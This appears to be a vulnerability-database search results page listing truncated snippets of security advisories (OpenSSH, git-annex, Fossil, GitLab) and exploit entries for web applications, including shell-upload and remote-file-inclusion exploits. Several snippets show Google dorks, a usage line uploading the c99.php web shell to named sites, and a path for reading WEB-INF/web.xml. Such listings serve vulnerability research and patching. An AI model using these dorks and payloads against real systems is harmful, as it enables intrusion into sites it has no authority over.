55 matches found
RockyLinux 9 : openssh (RLSA-2025:23480)
The remote RockyLinux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2025:23480 advisory. openssh: OpenSSH: Control characters in usernames can lead to code execution via ProxyCommand CVE-2025-61984 openssh: OpenSSH: Null character in ssh://...
CLSA-2026-1767627828 openssh: Fix of CVE-2025-61985
CVE-2025-61985: potential code execution using the ‘\0’ character in an ssh:// URI, when a ProxyCommand is used...
Linux Distros Unpatched Vulnerability : CVE-2017-12976
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - git-annex before 6.20170818 allows remote attackers to execute arbitrary commands via an ssh URL with an initial dash character in the hostname, as demonstrated...
MetaFox 5.1.8 Shell Upload
#!/usr/bin/env python3 Exploit Title: MetaFox Remote Shell Upload Google Dork: "Social network for niche communities" Exploit Author: The Joker Vendor Homepage: https://www.phpfox.com Version: = 5.1.8 import json import requests import sys if len(sys.argv) != 4: sys.exit("Usage: %s " % sys.argv[0]...
Exploit for Code Injection in Vmware Spring_Framework
Spring4Shell - CVE-2022-22965 Build - let's clone the repo...
WordPress Smart Product Review 1.0.4 Shell Upload
Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload Google Dork: inurl: /wp-content/plugins/smart-product-review/ Date: 16/11/2021 Exploit Author: Keyvan Hardani Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/ Version: = 1.0.4...
Billing System Project 1.0 - Remote Code Execution (Unauthenticated) Exploit
Exploit Title: Billing System Project 1.0 - Remote Code Execution RCE Unauthenticated Exploit Author: Talha DEMİRSOY Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html Version: V 1.0 Tested on: Linux & Windows import requests import...
Fossil Arbitrary Command Execution Vulnerability
Fossil is a simple, reliable distributed software configuration management system. An arbitrary command execution vulnerability exists in httptransport.c in Fossil before 2.4. A user-assisted remote attacker can exploit this vulnerability to execute arbitrary commands via an ssh URL with an initi...
GitLab Arbitrary Code Execution Vulnerability
GitLab is a set of open source applications developed using Ruby on Rails to implement a self-hosted Git version control system project repository, which has features similar to GitHub, with access to a project's file contents, commit history, bug list, etc. GitLab Community Edition (CE) is the...
Alibaba Clone B2B Marketplace Script Shell Upload Vulnerability
Alibaba Clone B2B Marketplace Script Shell Upload Vulnerability All Versions Usage Info Usage:alibaba.php host shell-file.php Ex:alibaba.php www.example.com c99.php Test : php alibaba.php tibastore.com c99.php php alibaba.php hechoenmexicob2b.com c99.php $val $data .= "--$boundary\n"; $data .=...
Content Builder 0.7.5 postComment.php Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/25914/info ContentBuilder CB is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the...
BrudaGB <= 1.1 (admin/index.php) Remote File Include Vulnerability
No description provided by source. BrudaGB = v1.1 o Remote File Inclusion Exploit Critical Level : Dangero...
Popper <= 1.41-r2 - (form) Remote File Include Vulnerability
No description provided by source. Popper = v1.41 form Remote File Inclusion Exploit Critical Level :...
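A series of serious issues in the KINGOSOFT university online teaching platform
Brief description: A series of serious issues in the KINGOSOFT university online teaching platform. Details: The KINGOSOFT university online teaching platform is another product of Qingguo Software (青果软件), and serious security risks were found in it. 1. File read vulnerability. This system is developed in J2EE; we access (the actual test address is not given here, because it is a school) http://test.com/testpath/download.jsp?downfile=WEB-INF/web.xml and get CASFilter edu.yale.its.tp.cas.client.filter.CASFilter edu.yale.its.tp.cas.client.filter.loginUrl...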
Free Simple Software v1.0 Remote File Inclusion Vulnerability
Exploit for php platform in category web applications Free Simple Software v1.0 Remote File Inclusion Vulnerability Free Simple Software V1.0 By : Dr.$audi SauDi ViRuS TeaM ...
Free Simple Software 1.0 - Remote File Inclusion
Free Simple Software 1.0 - Remote File Inclusion Free Simple Software V1.0 By : Dr.$audi SauDi ViRuS TeaM By : http://Sa-ViRuS.CoM Email : [email protected] Dork: Powered by free simple software Greets : RENO , Dr.php , ! BaD BoY ! , Gov.HaCkEr , Mind , AnTi SeCuRe Script HomePage:...
PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution
Date: 02/07/08 Note I modified a bit phpsploit for this exploit, because PHP Nuke plays with REQUEST_URI var ... Requirements register_globals=On phpreter phpreter is really easy to use: You can change mode using "mode=", with = sql, php or cmd If you want to understand how it works ... read the cod...
Content Builder 0.7.5 - postComment.php Remote File Inclusion
Content Builder 0.7.5 - postComment.php Remote File Inclusion source: https://www.securityfocus.com/bid/25914/info ContentBuilder CB is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to...
Content Builder 0.7.5 - 'postComment.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/25914/info ContentBuilder CB is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks a...
Dalai Forum Remote File Inclusion Exploit
Dalai Forum Remote File Inclusion Exploit DORK : "Dalai Forum"...